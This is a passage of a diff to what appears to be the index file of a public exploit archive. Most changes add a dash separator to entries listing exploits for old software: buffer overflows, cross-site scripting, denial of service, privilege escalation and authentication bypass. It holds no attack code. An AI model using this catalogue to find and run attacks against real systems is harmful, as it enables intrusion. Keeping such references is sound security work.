Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0 21030,platforms/windows/remote/21030.txt,"Snapstream Personal Video Station 1.2 a PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0 @@ -18340,7 +18340,7 @@ id,file,description,date,author,platform,type,port 21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 NT4ALL DoS",2001-08-03,hypoclear,windows,dos,0 -21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 DoS",1999-04-09,Epic,cgi,dos,0 +21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - DoS",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow (2)",1995-02-17,Xtremist,linux,remote,0 21833,platforms/php/webapps/21833.rb,"PhpTax pfilez Parameter Exec Remote Code Injection",2012-10-10,Metasploit,php,webapps,0 @@ -18361,10 +18361,10 @@ id,file,description,date,author,platform,type,port 21067,platforms/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure",2001-08-21,magnum,multiple,remote,0 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 - File Retrieval",2001-08-31,"Hannibal Lector",cgi,remote,0 21069,platforms/windows/local/21069.c,"Microsoft Windows 2000 RunAs Service Named Pipe Hijacking",2001-12-11,Camisade,windows,local,0 -21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 Insecure Password",2001-08-15,"Macintosh Security",osx,local,0 +21070,platforms/osx/local/21070.txt,"Apple Open Firmware 4.1.7/4.1.8 - Insecure Password",2001-08-15,"Macintosh Security",osx,local,0 21071,platforms/windows/local/21071.c,"Microsoft IIS 4/5 - SSI Buffer Overrun Privilege Elevation",2001-08-15,Indigo,windows,local,0 21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation",2001-08-15,"Digital Offense",windows,local,0 -21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local,0 +21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local,0 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x - LIST Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus ",linux,remote,0 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 Weak Password Encryption",2001-08-20,MacSec,osx,local,0 @@ -18379,7 +18379,7 @@ id,file,description,date,author,platform,type,port 21256,platforms/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow",2012-09-12,Metasploit,windows,local,0 21088,platforms/unix/remote/21088.pl,"AOLServer 3 Long Authentication String Buffer Overflow (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow (2)",2001-09-05,qitest1,unix,remote,0 -21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 Default Weak Password Encoding",2001-08-23,"E. van Elk",windows,local,0 +21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 - Default Weak Password Encoding",2001-08-23,"E. van Elk",windows,local,0 21091,platforms/windows/local/21091.txt,"UltraEdit 8.2 FTP Client Weak Password Encryption",2001-08-23,"E. van Elk",windows,local,0 21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service",2001-08-23,"Cisco Security",hardware,dos,0 21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 @@ -18413,7 +18413,7 @@ id,file,description,date,author,platform,type,port 21122,platforms/linux/dos/21122.sh,"Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos,0 21123,platforms/windows/dos/21123.txt,"Microsoft Windows 2000/NT Terminal Server Service RDP DoS",2001-10-18,"Luciano Martins",windows,dos,0 21124,platforms/linux/local/21124.txt,"Linux Kernel 2.2 / 2.4 - Ptrace/Setuid Exec Local Root",2001-10-18,"Rafal Wojtczuk",linux,local,0 -21125,platforms/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 Command Execution",2001-10-19,root@xpteam.f2s.com,cgi,remote,0 +21125,platforms/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 - Command Execution",2001-10-19,root@xpteam.f2s.com,cgi,remote,0 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0 21127,platforms/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing",2001-10-21,"Georgi Guninski",windows,remote,0 21128,platforms/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote,0 @@ -18451,9 +18451,9 @@ id,file,description,date,author,platform,type,port 21163,platforms/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service (2)",2001-11-29,"Alex Hernandez",windows,dos,0 21164,platforms/windows/remote/21164.txt,"Microsoft Internet Explorer 5.5/6.0 Spoofable File Extensions",2001-11-26,StatiC,windows,remote,0 21165,platforms/php/webapps/21165.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - user.php uname Parameter XSS",2001-12-03,"Cabezon Aurélien",php,webapps,0 -21166,platforms/php/webapps/21166.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x modules.php - Multiple Parameter XSS",2001-12-03,"Cabezon Aurélien",php,webapps,0 +21166,platforms/php/webapps/21166.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - modules.php Multiple Parameter XSS",2001-12-03,"Cabezon Aurélien",php,webapps,0 21167,platforms/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service",2001-12-03,"Marco Peereboom",openbsd,dos,0 -21168,platforms/php/webapps/21168.txt,"EasyNews 1.5 NewsDatabase/Template Modification",2001-12-01,"markus arndt",php,webapps,0 +21168,platforms/php/webapps/21168.txt,"EasyNews 1.5 - NewsDatabase/Template Modification",2001-12-01,"markus arndt",php,webapps,0 21169,platforms/windows/remote/21169.txt,"ZoneAlarm Pro 1.0/2.x - Outbound Packet Bypass",2001-12-06,"Tom Liston",windows,remote,0 21170,platforms/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 Game Server/Client Denial of Service",2001-12-07,sh0,windows,dos,0 21171,platforms/windows/dos/21171.c,"Microsoft Windows 2000 Internet Key Exchange DoS (1)",2001-12-11,"Nelson Brito",windows,dos,0 @@ -18463,7 +18463,7 @@ id,file,description,date,author,platform,type,port 21175,platforms/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service",2001-12-10,jimmers,windows,dos,0 21176,platforms/freebsd/local/21176.c,"FreeBSD 4.4 AIO Library Cross Process Memory Write",2001-12-10,"David Rufino",freebsd,local,0 21177,platforms/windows/dos/21177.txt,"Microsoft IIS 5.0 False Content-Length Field DoS",2001-12-11,"Ivan Hernandez Puga",windows,dos,0 -21178,platforms/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 Unauthorized Mail Server Use",2001-12-11,http-equiv,windows,remote,0 +21178,platforms/windows/remote/21178.html,"Brian Dorricott MAILTO 1.0.7-9 - Unauthorized Mail Server Use",2001-12-11,http-equiv,windows,remote,0 21179,platforms/solaris/remote/21179.pl,"Solaris 2.x/7.0/8 Derived 'login' Buffer Overflow",2003-01-09,snooq,solaris,remote,0 21180,platforms/solaris/remote/21180.c,"Solaris/SPARC 2.5.1/2.6/7/8 Derived 'login' Buffer Overflow",2004-12-04,"Marco Ivaldi",solaris,remote,0 21181,platforms/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0_Mozilla 0.9.6_Opera 5.1 Image Count Denial of Service",2001-12-11,"Pavel Titov",multiple,dos,0 @@ -18479,10 +18479,10 @@ id,file,description,date,author,platform,type,port 21191,platforms/linux/remote/21191.rb,"Openfiler 2.x - NetworkCard Command Execution",2012-09-10,Metasploit,linux,remote,0 21192,platforms/linux/remote/21192.c,"STunnel 3.x - Client Negotiation Protocol Format String",2001-12-22,deltha,linux,remote,0 21193,platforms/multiple/remote/21193.txt,"DeleGate 7.7.1 - Cross-Site Scripting",2001-12-28,"SNS Research",multiple,remote,0 -21194,platforms/cgi/remote/21194.txt,"Abe Timmerman zml.cgi File Disclosure",2001-12-31,blackshell,cgi,remote,0 +21194,platforms/cgi/remote/21194.txt,"Abe Timmerman - zml.cgi File Disclosure",2001-12-31,blackshell,cgi,remote,0 21195,platforms/windows/remote/21195.txt,"Microsoft Internet Explorer 5/6 GetObject File Disclosure",2002-01-01,"Georgi Guninski",windows,remote,0 21196,platforms/windows/remote/21196.txt,"AOL Instant Messenger 4.x - Remote Buffer Overflow",2002-01-02,"Matt Conover",windows,remote,0 -21197,platforms/multiple/remote/21197.txt,"BSCW 3.4/4.0 Insecure Default Installation",2002-01-03,"Thomas Seliger",multiple,remote,0 +21197,platforms/multiple/remote/21197.txt,"BSCW 3.4/4.0 - Insecure Default Installation",2002-01-03,"Thomas Seliger",multiple,remote,0 21198,platforms/windows/remote/21198.html,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration (1)",2002-01-03,"Tom Micklovitch",windows,remote,0 21199,platforms/windows/remote/21199.txt,"Microsoft Internet Explorer 5 JavaScript Local File Enumeration (2)",2002-01-03,"Liu Die",windows,remote,0 21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 - Arbitrary Command Execution",2012-09-25,LiquidWorm,php,webapps,0 @@ -18559,14 +18559,14 @@ id,file,description,date,author,platform,type,port 21273,platforms/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",php,webapps,0 21274,platforms/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",windows,remote,0 21275,platforms/osx/dos/21275.c,"ICQ For MacOS X 2.6 Client Denial of Service",2002-02-05,Stephen,osx,dos,0 -21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 Path Disclosure",2002-02-06,phinegeek,multiple,remote,0 +21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Path Disclosure",2002-02-06,phinegeek,multiple,remote,0 21277,platforms/php/webapps/21277.txt,"Portix-PHP 0.4 - Index.php Directory Traversal",2002-02-04,frog,php,webapps,0 21278,platforms/php/webapps/21278.txt,"Portix-PHP 0.4 View.php Directory Traversal",2002-02-04,frog,php,webapps,0 21279,platforms/php/webapps/21279.txt,"Portix-PHP 0.4 Cookie Manipulation",2002-02-04,frog,php,webapps,0 21280,platforms/linux/local/21280.c,"Hanterm 3.3 - Local Buffer Overflow (1)",2002-02-07,Xpl017Elz,linux,local,0 21281,platforms/linux/local/21281.c,"Hanterm 3.3 - Local Buffer Overflow (2)",2002-02-07,xperc,linux,local,0 -21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 Change Root Relative Path Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0 -21283,platforms/multiple/local/21283.txt,"OS/400 User Account Name Disclosure",2002-02-07,ken@FTU,multiple,local,0 +21282,platforms/atheos/local/21282.c,"AtheOS 0.3.7 - Change Root Relative Path Directory Escaping",2002-02-07,Jedi/Sector,atheos,local,0 +21283,platforms/multiple/local/21283.txt,"OS/400 - User Account Name Disclosure",2002-02-07,ken@FTU,multiple,local,0 21284,platforms/unixware/local/21284.c,"Caldera UnixWare 7.1.1 Message Catalog Environment Variable Format String",2002-02-07,jGgM,unixware,local,0 21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0 21286,platforms/windows/remote/21286.c,"Apple QuickTime 5.0 Content-Type Remote Buffer Overflow",2002-02-08,UNYUN,windows,remote,0 @@ -18585,7 +18585,7 @@ id,file,description,date,author,platform,type,port 21299,platforms/php/webapps/21299.txt,"Powie PForum 1.1x Username Cross-Site Scripting",2002-02-22,"Jens Liebchen",php,webapps,0 21300,platforms/php/webapps/21300.txt,"XMB Forum 1.6 pre-beta - Image Tag Script Injection",2002-02-22,skizzik,php,webapps,0 21301,platforms/php/webapps/21301.txt,"OpenBB 1.0.x - Image Tag Cross-Agent Scripting",2002-02-25,skizzik,php,webapps,0 -21302,platforms/linux/local/21302.c,"Century Software Term For Linux 6.27.869 Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local,0 +21302,platforms/linux/local/21302.c,"Century Software Term For Linux 6.27.869 - Command Line Buffer Overflow",2002-02-25,"Haiku Hacker",linux,local,0 21303,platforms/windows/remote/21303.txt,"Working Resources BadBlue 1.5/1.6 Triple-Dot-Slash Directory Traversal",2002-02-26,"Strumpf Noir Society",windows,remote,0 21304,platforms/php/webapps/21304.txt,"Ikonboard 2.17/3.0/3.1 Image Tag Cross-Agent Scripting",2002-02-26,godminus,php,webapps,0 21305,platforms/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service",2002-02-27,"Limpid Byte",windows,dos,0 @@ -18593,7 +18593,7 @@ id,file,description,date,author,platform,type,port 21307,platforms/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft DoS Device Name Denial of Service",2002-02-27,3APA3A,windows,dos,0 21308,platforms/asp/webapps/21308.txt,"Snitz Forums 2000 3.0/3.1/3.3 Image Tag Cross-Agent Scripting",2002-02-27,Justin,asp,webapps,0 21309,platforms/linux/remote/21309.c,"xtell 1.91.1/2.6.1 - Multiple Remote Buffer Overflow Vulnerabilities",2002-02-27,spybreak,linux,remote,0 -21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 User Status Remote Information Disclosure",2002-02-27,spybreak,linux,remote,0 +21310,platforms/linux/remote/21310.txt,"xtell 2.6.1 - User Status Remote Information Disclosure",2002-02-27,spybreak,linux,remote,0 21311,platforms/windows/remote/21311.txt,"BPM Studio Pro 4.2 HTTPD Directory Traversal",2002-02-27,UNTER,windows,remote,0 21312,platforms/php/webapps/21312.txt,"ReBB 1.0 Image Tag Cross-Agent Scripting",2002-03-04,skizzik,php,webapps,0 21313,platforms/windows/remote/21313.txt,"Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure",2002-03-05,"David Litchfield",windows,remote,0 @@ -18602,10 +18602,10 @@ id,file,description,date,author,platform,type,port 21318,platforms/windows/local/21318.pl,"Internet Download Manager - Stack Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 21319,platforms/aix/webapps/21319.txt,"Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF",2012-09-14,modpr0be,aix,webapps,0 21320,platforms/windows/local/21320.pl,"Internet Download Manager - SEH Based Buffer Overflow",2012-09-14,Dark-Puzzle,windows,local,0 -22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 Unauthorized Thread Reading",2002-12-06,"DNA ESC",php,webapps,0 +22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 - Unauthorized Thread Reading",2002-12-06,"DNA ESC",php,webapps,0 21323,platforms/linux/local/21323.c,"libdbus - 'DBUS_SYSTEM_BUS_ADDRESS' Local Privilege Escalation",2012-07-17,"Sebastian Krahmer",linux,local,0 21324,platforms/php/webapps/21324.txt,"luxcal 2.7.0 - Multiple Vulnerabilities",2012-09-17,L0n3ly-H34rT,php,webapps,0 -21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 Integer Overflow",2012-09-17,"Francis Provencher",windows,dos,0 +21326,platforms/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 - Integer Overflow",2012-09-17,"Francis Provencher",windows,dos,0 21327,platforms/php/webapps/21327.txt,"webERP 4.08.4 - WorkOrderEntry.php SQL Injection",2012-09-17,modpr0be,php,webapps,0 21329,platforms/php/webapps/21329.txt,"Auxilium PetRatePro - Multiple Vulnerabilities",2012-09-17,DaOne,php,webapps,0 21330,platforms/php/webapps/21330.txt,"Netsweeper WebAdmin Portal - Multiple Vulnerabilities",2012-09-17,"Jacob Holcomb",php,webapps,0 @@ -18633,7 +18633,7 @@ id,file,description,date,author,platform,type,port 21353,platforms/linux/local/21353.c,"Linux Kernel 2.2.x / 2.3 / 2.4.x - d_path() Path Truncation PoC",2002-03-26,cliph,linux,local,0 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",cgi,remote,0 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0 -21356,platforms/linux/local/21356.sh,"LogWatch 2.1.1/2.5 Insecure Temporary Directory Creation",2002-03-27,spybreak,linux,local,0 +21356,platforms/linux/local/21356.sh,"LogWatch 2.1.1/2.5 - Insecure Temporary Directory Creation",2002-03-27,spybreak,linux,local,0 21357,platforms/php/webapps/21357.txt,"PostNuke 0.703 caselist Arbitrary Module Include",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21358,platforms/php/webapps/21358.sh,"SquirrelMail 1.2.x - Theme Remote Command Execution",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21359,platforms/multiple/local/21359.c,"Progress 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,multiple,local,0 @@ -18649,9 +18649,9 @@ id,file,description,date,author,platform,type,port 21369,platforms/windows/remote/21369.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow (2)",2002-04-14,hsj,windows,remote,0 21370,platforms/windows/remote/21370.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow (3)",2002-04-10,NeMeS||y,windows,remote,0 21371,platforms/windows/remote/21371.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow (4)",2002-04-24,yuange,windows,remote,0 -21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 DoS Device Denial of Service",2002-04-24,ERRor,windows,dos,0 +21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - DoS Device Denial of Service",2002-04-24,ERRor,windows,dos,0 21372,platforms/windows/remote/21372.txt,"Microsoft IIS 4/5 HTTP Error Page Cross-Site Scripting",2002-04-10,"Thor Larholm",windows,remote,0 -21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 +21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 21374,platforms/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x Page Request SQL Injection",2002-04-11,"Simon Lodal",cgi,webapps,0 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilties",2002-04-11,"Paul Starzetz",linux,local,0 21376,platforms/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 History List Script Injection",2002-04-15,"Andreas Sandblad",windows,remote,0 @@ -18659,9 +18659,9 @@ id,file,description,date,author,platform,type,port 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote,0 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 URL Parameter Manipulation",2002-04-15,SeazoN,php,webapps,0 -21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 +21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 21382,platforms/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 -21383,platforms/php/webapps/21383.txt,"xNewsletter 1.0 Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 +21383,platforms/php/webapps/21383.txt,"xNewsletter 1.0 - Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 21384,platforms/multiple/remote/21384.txt,"Demarc PureSecure 1.0.5 - Authentication Check SQL Injection",2002-04-15,"pokleyzz sakamaniaka",multiple,remote,0 21385,platforms/windows/remote/21385.txt,"Microsoft IIS 5.0 CodeBrws.ASP Source Code Disclosure",2002-04-16,"H D Moore",windows,remote,0 21386,platforms/windows/remote/21386.html,"AOL Instant Messenger 4.x - Arbitrary File Creation",2002-04-17,"Noah Johnson",windows,remote,0 @@ -18675,7 +18675,7 @@ id,file,description,date,author,platform,type,port 21394,platforms/windows/webapps/21394.txt,"sonicwall email security 7.3.5 - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,windows,webapps,0 21395,platforms/hardware/webapps/21395.txt,"Fortigate UTM WAF Appliance - Multiple Vulnerabilities",2012-09-19,Vulnerability-Lab,hardware,webapps,0 21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 -21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",php,webapps,0 +21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",php,webapps,0 21398,platforms/linux/local/21398.txt,"SSH2 3.0 Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0 21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 Script Injection",2002-04-19,"Daniel Nyström",php,webapps,0 21400,platforms/asp/webapps/21400.txt,"Snitz Forums 2000 3.x - Members.ASP SQL Injection",2002-04-19,acemi,asp,webapps,0 @@ -18701,7 +18701,7 @@ id,file,description,date,author,platform,type,port 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Login Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting",2002-04-25,frog,linux,remote,0 21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection",2002-04-25,frog,php,webapps,0 -21424,platforms/php/webapps/21424.txt,"Admanager 1.1 Content Manipulation",2002-04-17,frog,php,webapps,0 +21424,platforms/php/webapps/21424.txt,"Admanager 1.1 - Content Manipulation",2002-04-17,frog,php,webapps,0 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 Direct Script Call Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps,0 @@ -18745,8 +18745,8 @@ id,file,description,date,author,platform,type,port 21465,platforms/hardware/dos/21465.txt,"Cisco IOS 11.x/12.0 - ICMP Redirect Denial of Service",2002-05-21,FX,hardware,dos,0 21466,platforms/windows/remote/21466.c,"YoungZSoft 3.30/4.0 CMailServer Buffer Overflow (1)",2002-05-20,anonymous,windows,remote,0 21467,platforms/windows/remote/21467.c,"YoungZSoft 3.30/4.0 CMailServer Buffer Overflow (2)",2002-05-21,Over_G,windows,remote,0 -21468,platforms/windows/remote/21468.pl,"Matu FTP Server 1.13 Buffer Overflow",2002-05-22,Kanatoko,windows,remote,0 -21469,platforms/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 Path Disclosure",2002-05-22,"Matt Moore",windows,remote,0 +21468,platforms/windows/remote/21468.pl,"Matu FTP Server 1.13 - Buffer Overflow",2002-05-22,Kanatoko,windows,remote,0 +21469,platforms/windows/remote/21469.txt,"NewAtlanta ServletExec/ISAPI 4.1 - Path Disclosure",2002-05-22,"Matt Moore",windows,remote,0 21470,platforms/windows/remote/21470.txt,"NewAtlanta ServletExec/ISAPI 4.1 - File Disclosure",2002-05-22,"Matt Moore",windows,remote,0 21471,platforms/windows/dos/21471.c,"NewAtlanta ServletExec/ISAPI 4.1 JSPServlet Denial of Service",2002-05-22,"Matt Moore",windows,dos,0 21472,platforms/hardware/dos/21472.pl,"Cisco CBOS 2.x - Broadband Operating System TCP/IP Stack Denial of Service",2002-05-23,blackangels,hardware,dos,0 @@ -18755,10 +18755,10 @@ id,file,description,date,author,platform,type,port 21475,platforms/windows/remote/21475.txt,"LocalWEB2000 2.1.0 Standard - File Disclosure",2002-05-24,"Tamer Sahin",windows,remote,0 21476,platforms/linux/dos/21476.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)",2002-05-24,zillion,linux,dos,0 21477,platforms/linux/dos/21477.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)",2002-05-24,zillion,linux,dos,0 -21478,platforms/php/webapps/21478.txt,"OpenBB 1.0 Unauthorized Moderator Access",2002-05-24,frog,php,webapps,0 +21478,platforms/php/webapps/21478.txt,"OpenBB 1.0 - Unauthorized Moderator Access",2002-05-24,frog,php,webapps,0 21479,platforms/php/webapps/21479.txt,"OpenBB 1.0.0 RC3 - Cross-Site Scripting",2002-05-24,frog,php,webapps,0 21480,platforms/cgi/webapps/21480.txt,"GNU Mailman 2.0.x - Admin Login Cross-Site Scripting",2002-05-20,office,cgi,webapps,0 -21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1-4 Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0 +21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1-4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0 21482,platforms/linux/dos/21482.txt,"MIT PGP Public Key Server 0.9.2/0.9.4 - Search String Remote Buffer Overflow",2002-05-24,Max,linux,dos,0 21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",windows,remote,0 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0 @@ -18797,7 +18797,7 @@ id,file,description,date,author,platform,type,port 21516,platforms/unix/local/21516.pl,"Ehud Gavron TrACESroute 6.1.1 Terminator Function Format String",2002-06-06,stringz,unix,local,0 21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 21518,platforms/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 System Oversized Font DoS",2002-06-10,"Tom Vogt",linux,dos,0 -21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 HTML Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 +21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 - HTML Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21520,platforms/linux/remote/21520.py,"QNX 6.5.0 / QCONN 1.4.207944 - Remote Command Execution",2012-09-25,Mor!p3r,linux,remote,0 21523,platforms/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",hardware,dos,0 21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion",2012-09-26,L0n3ly-H34rT,php,webapps,0 @@ -18811,7 +18811,7 @@ id,file,description,date,author,platform,type,port 21532,platforms/cgi/webapps/21532.txt,"CGIScript.net csNews 1.0 Double URL Encoding Unauthorized Administrative Access",2002-06-11,"Steve Gustin",cgi,webapps,0 21533,platforms/cgi/webapps/21533.txt,"CGIScript.net csNews 1.0 Header File Type Restriction Bypass",2002-06-11,"Steve Gustin",cgi,webapps,0 21534,platforms/linux/dos/21534.jsp,"Apache Tomcat 3/4 - JSP Engine Denial of Service",2002-06-12,"Marc Schoenefeld",linux,dos,0 -21535,platforms/cgi/webapps/21535.txt,"MakeBook 2.2 Form Field Input Validation",2002-06-12,b0iler,cgi,webapps,0 +21535,platforms/cgi/webapps/21535.txt,"MakeBook 2.2 - Form Field Input Validation",2002-06-12,b0iler,cgi,webapps,0 21536,platforms/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine Denial of Service",2002-06-12,"Marc Schoenefeld",windows,dos,0 21537,platforms/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 Invite Message Remote Buffer Overflow",2002-06-12,gobbles,linux,dos,0 21538,platforms/linux/local/21538.c,"Richard Gooch SimpleInit 2.0.2 Open File Descriptor",2002-06-12,"Patrick Smith",linux,local,0 @@ -18849,7 +18849,7 @@ id,file,description,date,author,platform,type,port 21570,platforms/php/webapps/21570.txt,"BasiliX Webmail 1.1 Message Content Script Injection",2002-06-19,"Ulf Harnhammar",php,webapps,0 21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x - 